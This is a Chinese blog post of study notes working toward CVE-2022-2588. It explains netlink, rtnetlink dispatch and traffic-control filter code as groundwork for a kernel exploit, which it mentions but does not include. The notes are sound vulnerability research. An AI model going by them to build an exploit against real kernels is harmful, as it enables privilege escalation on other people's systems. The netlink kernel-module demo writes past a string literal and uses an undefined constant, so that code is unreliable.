cve-2022-2588学习

感觉好牛，看描述是一个exp可以完成多个版本的通杀，因为在exp中并没有使用某一个特定的内核地址，所以就是说这个exp没有地址依赖，没有地址依赖那就没有内核版本限制了。最主要还是想学习一下这个漏洞利用才想着学习这个cve的，但是一看exp人傻了，七八百行，再加上网上的资料很少。。。彳亍。。。一周半起步了。

前置知识浅学

内核路由表

不只是路由器需要路由表，主机自己也得有路由表，路由表的作用其实就类似于导航的作用，它告诉主机数据包应该转发到哪里。如果主机不含路由表，那么它所有的数据包都传送不出去。所以不光是路由器，主机也会有自己的路由表。

可以通过route -n来查看主机的路由表,下面是我虚拟机的路由表。

内核 IP 路由表
目标            网关            子网掩码        标志  跃点   引用  使用 接口
0.0.0.0         192.168.11.2    0.0.0.0         UG    100    0        0 ens33
169.254.0.0     0.0.0.0         255.255.0.0     U     1000   0        0 ens33
172.17.0.0      0.0.0.0         255.255.0.0     U     0      0        0 docker0
192.168.11.0    0.0.0.0         255.255.255.0   U     100    0        0 ens33

一条路由信息主要包括以下几点。

目的地址
下一跳地址
子网掩码
网卡接口

内核子系统

linux内核主要由以下七个子系统组成，其中最主要的四个子系统是内存管理子系统、进程管理子系统、网络子系统、虚拟文件系统。

各个模块的大概依赖如下

稍微对网络子系统和虚拟文件系统做个了解

网络子系统

Linux网络子系统提供了对各种网络标准的存取和各种硬件的支持。下图是其整体结构。其可以分为协议层和网络驱动程序，其中网络协议主要负责实现每一种可能的网络传输协议，而网络驱动程序负责与硬件通信。

虚拟文件系统

Linux虚拟文件系统（VFS）隐藏了各种硬件的具体细节，为所有的设备提供了统一的接口，它是对各种文件系统的一个抽象：它使用超级块super block存放文件系统相关信息，使用索引节点inode存放文件的物理信息，使用目录项dentry存放文件的逻辑信息，其整体架构如下。

子系统之间通信

内核的子系统之间是互相依赖的，当某个子系统状态发生改变的时候，就必须使用一定的机制告知使用其服务的其他子系统，以便其他子系统采取相应的措施，但到底如何利用netlink进行子系统之间的通信还是没有查到，只知道各个子系统对不同的消息会有不同的处理措施。

netlink

内核和用户态进程进行双向通信的一种机制，非常强大，不仅可以支持内核子系统和用户态进程的通信，还可以进行内核中不同子系统之间的通信，但是我在谷歌或者百度中并没有找到相关机制说明和代码演示，只有内核和用户态进程之间通信的代码实践。

创建socket套接字的时候的结构体，和用户态socket的sockaddr_in结构体功能类似。

/* Netlink socket address; the netlink counterpart of sockaddr_in. */
struct sockaddr_nl
{
    sa_family_t    nl_family;    /* always AF_NETLINK */
    unsigned short    nl_pad;        /* currently unused, fill with 0 */
    __u32        nl_pid;        /* process pid    */
    __u32        nl_groups;    /* multicast groups mask */
};

其中nl_pid字段比较重要，当有多个用户态进程连接内核时，内核通过这个字段区分不同进程，一般使用getpid()赋值。

netlink消息体如下

消息头结构体如下

/* Fixed header that precedes the payload of every netlink message. */
struct nlmsghdr
{
    __u32        nlmsg_len;    /* Length of message including header */
    __u16        nlmsg_type;    /* Message content */
    __u16        nlmsg_flags;    /* Additional flags */
    __u32        nlmsg_seq;    /* Sequence number */
    __u32        nlmsg_pid;    /* Sending process PID */
};

用户态和内核态双向通信代码示例

这份代码是基于内核2.x的，不知道如今内核版本是否能用，并未做过实验，仅做记录学习使用。

用户态

#include <sys/stat.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <string.h>
#include <asm/types.h>
#include <linux/netlink.h>
#include <linux/socket.h>

#define MAX_PAYLOAD 1024 /*消息最大负载为1024字节*/

/*
 * Send argv[1] to the kernel over a NETLINK_TEST socket and print the reply.
 *
 * Returns 0 on success and 1 on any failure (missing/oversized argument,
 * socket/bind/allocation error, or a failed send/receive).
 */
int main(int argc, char* argv[])
{
    struct sockaddr_nl dest_addr;
    struct nlmsghdr *nlh = NULL;
    struct iovec iov;
    struct msghdr msg;
    int sock_fd = -1;
    int rc = 1;

    /* The payload comes from argv[1]; refuse to run without it. */
    if (argc < 2) {
        fprintf(stderr, "usage: %s <message>\n", argc > 0 ? argv[0] : "netlink_user");
        return 1;
    }
    /* The payload area is MAX_PAYLOAD bytes including the terminating NUL. */
    if (strlen(argv[1]) >= MAX_PAYLOAD) {
        fprintf(stderr, "message too long (max %d bytes)\n", MAX_PAYLOAD - 1);
        return 1;
    }

    sock_fd = socket(PF_NETLINK, SOCK_RAW, NETLINK_TEST);
    if (sock_fd == -1) {
        perror("can't create netlink socket!");
        return 1;
    }

    memset(&dest_addr, 0, sizeof(dest_addr));
    dest_addr.nl_family = AF_NETLINK;
    dest_addr.nl_pid = 0;    /* the message is addressed to the kernel */
    dest_addr.nl_groups = 0; /* no multicast group is used in this example */

    if (bind(sock_fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr)) == -1) {
        perror("can't bind sockfd with sockaddr_nl!");
        goto out;
    }

    nlh = malloc(NLMSG_SPACE(MAX_PAYLOAD));
    if (nlh == NULL) {
        perror("alloc mem failed!");
        goto out;
    }

    /* Zero the whole allocation (header + aligned payload), not only MAX_PAYLOAD bytes,
     * so no uninitialised heap bytes are handed to sendmsg(). */
    memset(nlh, 0, NLMSG_SPACE(MAX_PAYLOAD));

    /* Fill in the netlink message header. */
    nlh->nlmsg_len = NLMSG_SPACE(MAX_PAYLOAD);
    nlh->nlmsg_pid = getpid();    /* tell the kernel whom to answer */
    nlh->nlmsg_type = NLMSG_NOOP; /* payload is carried in a no-op message */
    nlh->nlmsg_flags = 0;

    /* Payload is the first command-line argument; its length was checked above. */
    strcpy(NLMSG_DATA(nlh), argv[1]);

    /* Wrap the message in the iovec/msghdr pair expected by sendmsg()/recvmsg(). */
    memset(&iov, 0, sizeof(iov));
    iov.iov_base = (void *)nlh;
    iov.iov_len = nlh->nlmsg_len;
    memset(&msg, 0, sizeof(msg));
    msg.msg_iov = &iov;
    msg.msg_iovlen = 1;

    if (sendmsg(sock_fd, &msg, 0) == -1) {
        perror("sendmsg");
        goto out;
    }

    /* Wait for the kernel's answer, reusing the same buffer. */
    printf("waiting message from kernel!\n");
    memset(NLMSG_DATA(nlh), 0, MAX_PAYLOAD);
    if (recvmsg(sock_fd, &msg, 0) == -1) {
        perror("recvmsg");
        goto out;
    }
    /* Guarantee termination even if the reply filled the whole payload area. */
    ((char *)NLMSG_DATA(nlh))[MAX_PAYLOAD - 1] = '\0';
    printf("Got response: %s\n", (char *)NLMSG_DATA(nlh));
    rc = 0;

out:
    /* Single exit path: release the socket and the message buffer. */
    close(sock_fd);
    free(nlh);
    return rc;
}

内核态

#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/skbuff.h>
#include <linux/init.h>
#include <linux/ip.h>
#include <linux/types.h>
#include <linux/sched.h>
#include <net/sock.h>
#include <net/netlink.h> /*该文头文件里包含了linux/netlink.h，因为我们要用到net/netlink.h中的某些API函数，nlmsg_put()*/

MODULE_LICENSE("GPL");
MODULE_AUTHOR("Koorey King");

struct sock *nl_sk = NULL;
//向用户空间发送消息的接口
void sendnlmsg(char *message,int dstPID)
{
    struct sk_buff *skb;
    struct nlmsghdr *nlh;
    int len = NLMSG_SPACE(MAX_MSGSIZE);
    int slen = 0;

    if(!message || !nl_sk){
        return;
    }

    // 为新的 sk_buffer申请空间
    skb = alloc_skb(len, GFP_KERNEL);
    if(!skb){
        printk(KERN_ERR "my_net_link: alloc_skb Error./n");
        return;
    }

    slen = strlen(message)+1;

    //用nlmsg_put()来设置netlink消息头部
    nlh = nlmsg_put(skb, 0, 0, 0, MAX_MSGSIZE, 0);

    // 设置Netlink的控制块
    NETLINK_CB(skb).pid = 0; // 消息发送者的id标识，如果是内核发的则置0
    NETLINK_CB(skb).dst_group = 0; //如果目的组为内核或某一进程，该字段也置0

    message[slen] = '\0';
    memcpy(NLMSG_DATA(nlh), message, slen+1);

    //通过netlink_unicast()将消息发送用户空间由dstPID所指定了进程号的进程
    netlink_unicast(nl_sk,skb,dstPID,0);
    printk("send OK!\n");
    return;
}

/*
 * Input callback of the netlink socket: drain the receive queue, log each
 * payload and answer the sender with a fixed string.
 */
static void nl_data_ready (struct sock *sk, int len)
{
    struct sk_buff *pkt;

    for (pkt = skb_dequeue(&sk->sk_receive_queue);
         pkt != NULL;
         pkt = skb_dequeue(&sk->sk_receive_queue))
    {
        /* The netlink header sits at the start of the skb data. */
        struct nlmsghdr *hdr = (struct nlmsghdr *)pkt->data;

        printk("%s: received netlink message payload: %s \n", __FUNCTION__, (char*)NLMSG_DATA(hdr));
        /* The sender stored its id in nlmsg_pid, so reply to that id. */
        sendnlmsg("I see you",hdr->nlmsg_pid);
        kfree_skb(pkt);
    }
    printk("recvied finished!\n");
}

/*
 * Module entry point: create the kernel-side NETLINK_TEST socket with
 * nl_data_ready as its input callback.
 *
 * Returns 0 on success, -ENOMEM if the socket could not be created (so the
 * module is not left loaded with nl_sk == NULL).
 */
static int __init myinit_module(void)
{
    printk("my netlink in\n");
    nl_sk = netlink_kernel_create(NETLINK_TEST,0,nl_data_ready,THIS_MODULE);
    if (!nl_sk) {
        printk(KERN_ERR "my_net_link: netlink_kernel_create failed.\n");
        return -ENOMEM;
    }
    return 0;
}

/*
 * Module exit point: release the netlink socket created at init time.
 * Guards against nl_sk being NULL so unloading never dereferences a NULL pointer.
 */
static void __exit mycleanup_module(void)
{
    printk("my netlink out!\n");
    if (nl_sk && nl_sk->sk_socket)
        sock_release(nl_sk->sk_socket);
    nl_sk = NULL;
}

module_init(myinit_module);
module_exit(mycleanup_module);

linux流量控制

概念理解

在概念上有了一个大致了解，但不多，在Linux中要实现对数据包接收和发送的这些控制行为，需要使用队列结构来临时保存数据包。在Linux实现中，把这种包括数据结构和算法实现的控制机制抽象为结构队列规程:Queuing discipline，简称为qdisc。qdisc对外暴露两个回调接口enqueue和dequeue分别用于数据包入队和数据包出队，而具体的排队算法实现则在qdisc内部隐藏。不同的qdisc实现在Linux内核中实现为不同的内核模块。

qdisc的实现可以非常简单，比如只包含单个队列，数据包先进先出，如: pfifo, 代码位于net/sched/sch_fifo.c。也可以实现相当复杂的调度逻辑。比如，可以根据数据包的属性进行过滤分类，而针对不同的分类:class采用不同的算法来进行处理。class可以理解为qdisc的载体，它还可以包含子类与qdisc。用来实现过滤逻辑的组件叫做filter，也叫做分类器classifier, 它需要挂载在qdisc或者class上。

基于qdisc、class和filter这三种元素可以构建出非常复杂的树形qdisc结构，极大扩展流量控制的能力。

对于树形结构的qdisc, 当数据包流经最顶层qdisc时，会层层向下递归进行调用。例如，父对象(qdisc/class)的enqueue回调接口被调用时，其上所挂载的所有filter依次被调用，直到一个filter匹配成功。然后将数据包入队到filter所指向的class，具体实现则是调用class所配置的Qdisc的enqueue函数。没有成功匹配filter的数据包分类到默认的class中。

系统资源控制

每一个进程都有自己的一组资源限制，在(*)inux系统中我们可以通过

int getrlimit(int resource, struct rlimit *rlim);
int setrlimit(int resource, const struct rlimit *rlim);

resource：可能的选择有

RLIMIT_AS //进程的最大虚内存空间，字节为单位。
RLIMIT_CORE //核心转储（core dump）文件的最大长度。
RLIMIT_CPU //最大允许的CPU使用时间，秒为单位。当进程达到软限制，内核将给其发送SIGXCPU信号，这一信号的默认行为是终止进程的执行。然而，可以捕捉信号，处理句柄可将控制返回给主程序。如果进程继续耗费CPU时间，核心会以每秒一次的频率给其发送SIGXCPU信号，直到达到硬限制，那时将给进程发送 SIGKILL信号终止其执行。
RLIMIT_DATA //进程数据段的最大值。
RLIMIT_FSIZE //进程可建立的文件的最大长度。如果进程试图超出这一限制时，核心会给其发送SIGXFSZ信号，默认情况下将终止进程的执行。
RLIMIT_LOCKS //进程可建立的锁和租赁的最大值。
RLIMIT_MEMLOCK //进程可锁定在内存中的最大数据量，字节为单位。
RLIMIT_MSGQUEUE //进程可为POSIX消息队列分配的最大字节数。
RLIMIT_NICE //进程可通过setpriority() 或 nice()调用设置的nice值（优先级）上限。
RLIMIT_NOFILE //指定比进程可打开的最大文件描述词大一的值，超出此值，将会产生EMFILE错误。
RLIMIT_NPROC //用户可拥有的最大进程数。
RLIMIT_RTPRIO //进程可通过sched_setscheduler 和 sched_setparam设置的最大实时优先级。
RLIMIT_SIGPENDING //用户可拥有的最大挂起信号数。
RLIMIT_STACK //最大的进程堆栈，以字节为单位。

这2个API来取得和设置资源
getrlimit用来取得资源限制，setrlimit用来设置资源限制。这两个函数都需要把要控制的资源（比如CPU、内存、文件描述符个数等）作为第一个参数传入，第二个参数是一个rlimit结构体的地址（指针），它的结构定义如下：
定义放在头文件/usr/include/bits/resource.h中

/* Soft/hard limit pair passed to getrlimit()/setrlimit() for one resource. */
struct rlimit
    {
     /* The current (soft) limit.    */
     rlim_t rlim_cur;
     /* The hard limit.    */
     rlim_t rlim_max;
    };

结构体中 rlim_cur是要取得或设置的资源软限制的值，rlim_max是硬限制
这两个值的设置有一个小的约束：
1）任何进程可以将软限制改为小于或等于硬限制
2）任何进程都可以将硬限制降低，但普通用户降低了就无法提高，该值必须等于或大于软限制
3）只有超级用户可以提高硬限制
一个无限的限制由常量RLIM_INFINITY指定（The value RLIM_INFINITY denotes no limit on a resource ）

漏洞模块rtnetlink分析

netlink机制有很多协议，每个协议处理不同的事情，rtnetlink就是netlink的其中一个协议，下面就是netlink协议的一些宏定义。

/* Netlink protocol numbers, used as the protocol argument of socket() for netlink sockets. */
#define NETLINK_ROUTE        0    /* Routing/device hook                */
#define NETLINK_UNUSED        1    /* Unused number                */
#define NETLINK_USERSOCK    2    /* Reserved for user mode socket protocols     */
#define NETLINK_FIREWALL    3    /* Firewalling hook                */
#define NETLINK_INET_DIAG    4    /* INET socket monitoring            */
#define NETLINK_NFLOG        5    /* netfilter/iptables ULOG */
#define NETLINK_XFRM        6    /* ipsec */
#define NETLINK_SELINUX        7    /* SELinux event notifications */
#define NETLINK_ISCSI        8    /* Open-iSCSI */
#define NETLINK_AUDIT        9    /* auditing */
#define NETLINK_FIB_LOOKUP    10    
#define NETLINK_CONNECTOR    11
#define NETLINK_NETFILTER    12    /* netfilter subsystem */
#define NETLINK_IP6_FW        13
#define NETLINK_DNRTMSG        14    /* DECnet routing messages */
#define NETLINK_KOBJECT_UEVENT    15    /* Kernel messages to userspace */
#define NETLINK_GENERIC        16
/* leave room for NETLINK_DM (DM Events) */
#define NETLINK_SCSITRANSPORT    18    /* SCSI Transports */
#define NETLINK_ECRYPTFS    19
#define NETLINK_TEST    20 /* custom protocol added by the user (used by the demo code) */

每种协议处理不同的事情，那rtnetlink是干什么的呢，在我的初步了解中，rtnetlink主要可以更改和获取内核的一些网络配置，比如说网络路由、IP地址、链接参数、邻居设置、排队规则、流量类别和数据包分类器都可以通过NETLINK_ROUTE套接字进行控制。

rtnetlink主要由以下消息类型组成

RTM_NEWLINK、RTM_DELLINK、RTM_GETLINK创建、删除或获取有关特定网络接口的信息。
RTM_NEWADDR、RTM_DELADDR、RTM_GETADDR添加、删除或接收有关与接口关联的IP地址的信息。
RTM_NEWROUTE、RTM_DELROUTE、RTM_GETROUTE创建、删除或接收有关网络路由的信息。
RTM_NEWNEIGH、RTM_DELNEIGH、RTM_GETNEIGH添加、删除或接收有关邻居表条目的信息（例如，ARP条目）。
RTM_NEWRULE、RTM_DELRULE、RTM_GETRULE添加、删除或检索路由规则。
RTM_NEWQDISC、RTM_DELQDISC、RTM_GETQDISC添加、删除或获取排队规则。
RTM_NEWTCLASS、RTM_DELTCLASS、RTM_GETTCLASS添加、删除或获取流量类别。
RTM_NEWTFILTER, RTM_DELTFILTER, RTM_GETTFILTER添加、删除或接收有关流量过滤器的信息。

rtnetlink相关代码分析

使用NETLINK_ROUTE就可以和rtnetlink进行通信了，rtnetlink有不同的消息类型，不同的消息类型也有不同的type,所以rtnetlink进行初始化的时候就会针对不同情况注册不同的操作函数。

/*
 * Boot-time initialisation of rtnetlink: registers the per-net subsystem and
 * the netdevice notifier, then registers the doit/dumpit handlers for the
 * link, address/route dump, link-property, bridge and statistics messages.
 * Panics if the per-net subsystem cannot be registered.
 */
void __init rtnetlink_init(void)
{
	if (register_pernet_subsys(&rtnetlink_net_ops))
		panic("rtnetlink_init: cannot initialize rtnetlink\n");

	register_netdevice_notifier(&rtnetlink_dev_notifier);

	/* Generic (PF_UNSPEC) link handlers. */
	rtnl_register(PF_UNSPEC, RTM_GETLINK, rtnl_getlink,
		      rtnl_dump_ifinfo, 0);
	rtnl_register(PF_UNSPEC, RTM_SETLINK, rtnl_setlink, NULL, 0);
	rtnl_register(PF_UNSPEC, RTM_NEWLINK, rtnl_newlink, NULL, 0);
	rtnl_register(PF_UNSPEC, RTM_DELLINK, rtnl_dellink, NULL, 0);

	/* Dump-only handlers: no doit, only rtnl_dump_all as dumpit. */
	rtnl_register(PF_UNSPEC, RTM_GETADDR, NULL, rtnl_dump_all, 0);
	rtnl_register(PF_UNSPEC, RTM_GETROUTE, NULL, rtnl_dump_all, 0);
	rtnl_register(PF_UNSPEC, RTM_GETNETCONF, NULL, rtnl_dump_all, 0);

	rtnl_register(PF_UNSPEC, RTM_NEWLINKPROP, rtnl_newlinkprop, NULL, 0);
	rtnl_register(PF_UNSPEC, RTM_DELLINKPROP, rtnl_dellinkprop, NULL, 0);

	/* Bridge (PF_BRIDGE) specific handlers. */
	rtnl_register(PF_BRIDGE, RTM_NEWNEIGH, rtnl_fdb_add, NULL, 0);
	rtnl_register(PF_BRIDGE, RTM_DELNEIGH, rtnl_fdb_del, NULL, 0);
	rtnl_register(PF_BRIDGE, RTM_GETNEIGH, rtnl_fdb_get, rtnl_fdb_dump, 0);

	rtnl_register(PF_BRIDGE, RTM_GETLINK, NULL, rtnl_bridge_getlink, 0);
	rtnl_register(PF_BRIDGE, RTM_DELLINK, rtnl_bridge_dellink, NULL, 0);
	rtnl_register(PF_BRIDGE, RTM_SETLINK, rtnl_bridge_setlink, NULL, 0);

	rtnl_register(PF_UNSPEC, RTM_GETSTATS, rtnl_stats_get, rtnl_stats_dump,
		      0);
	rtnl_register(PF_UNSPEC, RTM_SETSTATS, rtnl_stats_set, NULL, 0);
}

主要就是调用了rtnl_register()函数。

/*
 * Register the doit and/or dumpit handler for one (protocol, msgtype) pair.
 * Thin wrapper around rtnl_register_internal() with a NULL owner; a failure
 * is only logged, it is not reported to the caller.
 */
void rtnl_register(int protocol, int msgtype,
		   rtnl_doit_func doit, rtnl_dumpit_func dumpit,
		   unsigned int flags)
{
	int err;

	err = rtnl_register_internal(NULL, protocol, msgtype, doit, dumpit,
				     flags);
	if (err)
		pr_err("Unable to register rtnetlink message handler, "
		       "protocol = %d, message type = %d\n", protocol, msgtype);
}

通过rtnl_register()函数声明可见不同消息类型的不同type有两种操作，一种是doit,一种是dumpit。有的类型这两种操作都有，有的类型只有一种。

在rtnl_register()函数中又调用了rtnl_register_internal。

/*
 * Install or update the rtnl_link entry for (protocol, msgtype) in
 * rtnl_msg_handlers under rtnl_lock.
 *
 * The per-protocol table is allocated on first use. An existing entry is never
 * modified in place: it is duplicated, the copy is updated and published with
 * rcu_assign_pointer(), and the old entry is released with kfree_rcu().
 *
 * Returns 0 on success, -ENOBUFS if an allocation fails.
 */
static int rtnl_register_internal(struct module *owner,
				  int protocol, int msgtype,
				  rtnl_doit_func doit, rtnl_dumpit_func dumpit,
				  unsigned int flags)
{
	struct rtnl_link *link, *old;
	struct rtnl_link __rcu **tab;
	int msgindex;
	int ret = -ENOBUFS;

	BUG_ON(protocol < 0 || protocol > RTNL_FAMILY_MAX);
	msgindex = rtm_msgindex(msgtype);

	rtnl_lock();
	/* First level: one table per protocol, created lazily. */
	tab = rtnl_dereference(rtnl_msg_handlers[protocol]);
	if (tab == NULL) {
		tab = kcalloc(RTM_NR_MSGTYPES, sizeof(void *), GFP_KERNEL);
		if (!tab)
			goto unlock;

		/* ensures we see the 0 stores */
		rcu_assign_pointer(rtnl_msg_handlers[protocol], tab);
	}

	/* Second level: one rtnl_link per message index; copy-then-replace. */
	old = rtnl_dereference(tab[msgindex]);
	if (old) {
		link = kmemdup(old, sizeof(*old), GFP_KERNEL);
		if (!link)
			goto unlock;
	} else {
		link = kzalloc(sizeof(*link), GFP_KERNEL);
		if (!link)
			goto unlock;
	}

	WARN_ON(link->owner && link->owner != owner);
	link->owner = owner;

	/* Only overwrite a handler when a new one is supplied; warn on conflicts. */
	WARN_ON(doit && link->doit && link->doit != doit);
	if (doit)
		link->doit = doit;
	WARN_ON(dumpit && link->dumpit && link->dumpit != dumpit);
	if (dumpit)
		link->dumpit = dumpit;

	link->flags |= flags;

	/* publish protocol:msgtype */
	rcu_assign_pointer(tab[msgindex], link);
	ret = 0;
	if (old)
		kfree_rcu(old, rcu);
unlock:
	rtnl_unlock();
	return ret;
}

涉及到的结构体如下

/* Handler record stored per (protocol, message index) in rtnl_msg_handlers. */
struct rtnl_link {
	rtnl_doit_func		doit;	/* handler for non-dump requests */
	rtnl_dumpit_func	dumpit;	/* handler for dump requests */
	struct module		*owner;	/* module pinned while a handler runs */
	unsigned int		flags;	/* e.g. RTNL_FLAG_DOIT_UNLOCKED */
	struct rcu_head		rcu;	/* used by kfree_rcu() when the entry is replaced */
};

有个全局指针数组static struct rtnl_link __rcu *__rcu *rtnl_msg_handlers[RTNL_FAMILY_MAX + 1];，他其实是一个二重指针，第一重下标是协议族protocol（即本文所说的消息类型），第二重下标是由msgtype换算出来的msgindex（即消息的type），所以每一个消息类型的每一个type都对应一个struct rtnl_link结构体。

除了rtnetlink_init会注册消息的操作之外，tc_filter_init也会注册一些消息的操作,其中RTM_NEWTFILTER这个类型就是添加一个流量过滤器，他只有doit操作，函数为tc_new_tfilter().

/*
 * Initialise the TC filter layer: create the ordered workqueue, register the
 * per-net subsystem and register the rtnetlink handlers for the TFILTER and
 * CHAIN messages.
 *
 * Returns 0 on success, -ENOMEM if the workqueue cannot be created, or the
 * error from register_pernet_subsys() (after destroying the workqueue).
 */
static int __init tc_filter_init(void)
{
	int err;

	tc_filter_wq = alloc_ordered_workqueue("tc_filter_workqueue", 0);
	if (!tc_filter_wq)
		return -ENOMEM;

	err = register_pernet_subsys(&tcf_net_ops);
	if (err)
		goto err_register_pernet_subsys;

	/* The three TFILTER doit handlers are registered with RTNL_FLAG_DOIT_UNLOCKED. */
	rtnl_register(PF_UNSPEC, RTM_NEWTFILTER, tc_new_tfilter, NULL,
		      RTNL_FLAG_DOIT_UNLOCKED);
	rtnl_register(PF_UNSPEC, RTM_DELTFILTER, tc_del_tfilter, NULL,
		      RTNL_FLAG_DOIT_UNLOCKED);
	rtnl_register(PF_UNSPEC, RTM_GETTFILTER, tc_get_tfilter,
		      tc_dump_tfilter, RTNL_FLAG_DOIT_UNLOCKED);
	rtnl_register(PF_UNSPEC, RTM_NEWCHAIN, tc_ctl_chain, NULL, 0);
	rtnl_register(PF_UNSPEC, RTM_DELCHAIN, tc_ctl_chain, NULL, 0);
	rtnl_register(PF_UNSPEC, RTM_GETCHAIN, tc_ctl_chain,
		      tc_dump_chain, 0);

	return 0;

err_register_pernet_subsys:
	destroy_workqueue(tc_filter_wq);
	return err;
}

现在稍微理清了每个消息类型的每个type如何在内核中组织存储，那该如何调用这些消息的操作函数呢，比如说RTM_NEWTFILTER的doit.

当用户进程通过NETLINK_ROUTE创建套接字并且发送RTM_NEWTFILTER消息用于创建一个流量过滤器时,内核会调用rtnetlink_rcv_msg()函数来处理rtnetlink消息。

struct nlmsghdr *nlh这个结构体在学习netlink的时候就已经见过了,其中family就是消息类型也就是protocol,type就是msgtype，然后调用link = rtnl_get_link(family, type);获得对应的link.获得了link后就调用link->doit()函数，进而调用到了tc_new_tfilter()

/*
 * Dispatch one received rtnetlink message to the handler registered for its
 * (family, type).
 *
 * - Messages whose type is above RTM_MAX are rejected with -EOPNOTSUPP.
 * - Messages of kind != 2 require CAP_NET_ADMIN (-EPERM otherwise).
 * - Kind-2 messages carrying NLM_F_DUMP go to the dumpit handler via
 *   netlink_dump_start(); everything else goes to the doit handler.
 * - If no handler exists for the given family, the PF_UNSPEC one is tried.
 *
 * Returns the handler's result, or a negative errno as described above.
 */
static int rtnetlink_rcv_msg(struct sk_buff *skb, struct nlmsghdr *nlh,
			     struct netlink_ext_ack *extack)
{
	struct net *net = sock_net(skb->sk);
	struct rtnl_link *link;
	struct module *owner;
	int err = -EOPNOTSUPP;
	rtnl_doit_func doit;
	unsigned int flags;
	int kind;
	int family;
	int type;

	type = nlh->nlmsg_type;
	if (type > RTM_MAX)
		return -EOPNOTSUPP;

	/* From here on, type is relative to RTM_BASE. */
	type -= RTM_BASE;

	/* All the messages must have at least 1 byte length */
	if (nlmsg_len(nlh) < sizeof(struct rtgenmsg))
		return 0;

	/* The protocol family is the first field of the message payload. */
	family = ((struct rtgenmsg *)nlmsg_data(nlh))->rtgen_family;
	kind = type&3;

	/* Only kind 2 is allowed without CAP_NET_ADMIN. */
	if (kind != 2 && !netlink_net_capable(skb, CAP_NET_ADMIN))
		return -EPERM;

	rcu_read_lock();
	/* Dump request: look up dumpit and hand it to netlink_dump_start(). */
	if (kind == 2 && nlh->nlmsg_flags&NLM_F_DUMP) {
		struct sock *rtnl;
		rtnl_dumpit_func dumpit;
		u32 min_dump_alloc = 0;

		link = rtnl_get_link(family, type);
		if (!link || !link->dumpit) {
			/* No family-specific dumpit: fall back to PF_UNSPEC. */
			family = PF_UNSPEC;
			link = rtnl_get_link(family, type);
			if (!link || !link->dumpit)
				goto err_unlock;
		}
		owner = link->owner;
		dumpit = link->dumpit;

		if (type == RTM_GETLINK - RTM_BASE)
			min_dump_alloc = rtnl_calcit(skb, nlh);

		err = 0;
		/* need to do this before rcu_read_unlock() */
		if (!try_module_get(owner))
			err = -EPROTONOSUPPORT;

		rcu_read_unlock();

		rtnl = net->rtnl;
		if (err == 0) {
			struct netlink_dump_control c = {
				.dump		= dumpit,
				.min_dump_alloc	= min_dump_alloc,
				.module		= owner,
			};
			err = netlink_dump_start(rtnl, skb, nlh, &c);
			/* netlink_dump_start() will keep a reference on
			 * module if dump is still in progress.
			 */
			module_put(owner);
		}
		return err;
	}

	/* Non-dump request: look up doit, again falling back to PF_UNSPEC. */
	link = rtnl_get_link(family, type);
	if (!link || !link->doit) {
		family = PF_UNSPEC;
		link = rtnl_get_link(PF_UNSPEC, type);
		if (!link || !link->doit)
			goto out_unlock;
	}

	owner = link->owner;
	if (!try_module_get(owner)) {
		err = -EPROTONOSUPPORT;
		goto out_unlock;
	}

	flags = link->flags;
	/* Handlers flagged DOIT_UNLOCKED are called without taking rtnl_lock here. */
	if (flags & RTNL_FLAG_DOIT_UNLOCKED) {
		doit = link->doit;
		rcu_read_unlock();
		if (doit)
			err = doit(skb, nlh, extack);
		module_put(owner);
		return err;
	}
	rcu_read_unlock();

	/* Locked path: the link is looked up again after taking rtnl_lock. */
	rtnl_lock();
	link = rtnl_get_link(family, type);
	if (link && link->doit)
		err = link->doit(skb, nlh, extack);
	rtnl_unlock();

	module_put(owner);

	return err;

out_unlock:
	rcu_read_unlock();
	return err;

err_unlock:
	rcu_read_unlock();
	return -EOPNOTSUPP;
}

下面继续分析tc_new_tfilter()函数,这个函数代码较多就不摆出来了，主要看一下关键代码

在看关键代码之前首先要搞清楚一个数据结构

/* Header of one netlink attribute; the attribute value follows it in memory. */
struct nlattr {
	__u16           nla_len;	/* length of header + value */
	__u16           nla_type;	/* attribute type */
};

这个是netlink一般的数据段格式，图示如下。

一个nlattr+value就相当于一个数据段的字段了。其中length是nlattr+value的总长度。tc_new_tfilter()函数首先初始化了变量struct nlattr *tca[TCA_MAX + 1],他是一个结构体指针数组。数组中的每个指针都指向了一个用户进程传进来的字段的首地址。

获取每一个字段之后，后面就是对字段的解析了，首先是从字段中获取过滤器的名字

if (tcf_proto_check_kind(tca[TCA_KIND], name)) {
		NL_SET_ERR_MSG(extack, "Specified TC filter name too long");
		err = -EINVAL;
		goto errout;
	}

然后是根据chainidx(可控)获取chain,然后根据chain获取一个tp(struct tcf_proto),

tp = tcf_chain_tp_find(chain, &chain_info, protocol,
			       prio, prio_allocate);
	if (IS_ERR(tp)) {
		NL_SET_ERR_MSG(extack, "Filter with specified priority/protocol not found");
		err = PTR_ERR(tp);
		goto errout_locked;
	}

如果tp不存在还会根据过滤器名称name调用tcf_proto_create()创建一个新的tp

tp_new = tcf_proto_create(name, protocol, prio, chain,
					  rtnl_held, extack);
		if (IS_ERR(tp_new)) {
			err = PTR_ERR(tp_new);
			goto errout_tp;
		}

/*
 * Allocate and initialise a new tcf_proto of the given kind.
 *
 * The classifier ops are looked up by kind via tcf_proto_lookup_ops(), the
 * basic fields are filled in, the refcount is set to 1 and the kind-specific
 * ops->init() is called.
 *
 * Returns the new tcf_proto, or an ERR_PTR: -ENOBUFS if the allocation fails,
 * the lookup error, or the error returned by ops->init() (in which case the
 * ops owner module reference is dropped first).
 */
static struct tcf_proto *tcf_proto_create(const char *kind, u32 protocol,
					  u32 prio, struct tcf_chain *chain,
					  bool rtnl_held,
					  struct netlink_ext_ack *extack)
{
	struct tcf_proto *tp;
	int err;

	tp = kzalloc(sizeof(*tp), GFP_KERNEL);
	if (!tp)
		return ERR_PTR(-ENOBUFS);

	tp->ops = tcf_proto_lookup_ops(kind, rtnl_held, extack);
	if (IS_ERR(tp->ops)) {
		err = PTR_ERR(tp->ops);
		goto errout;
	}
	tp->classify = tp->ops->classify;
	tp->protocol = protocol;
	tp->prio = prio;
	tp->chain = chain;
	spin_lock_init(&tp->lock);
	refcount_set(&tp->refcnt, 1);

	/* Kind-specific setup, e.g. route4_init() for kind "route". */
	err = tp->ops->init(tp);
	if (err) {
		module_put(tp->ops->owner);
		goto errout;
	}
	return tp;

errout:
	kfree(tp);
	return ERR_PTR(err);
}

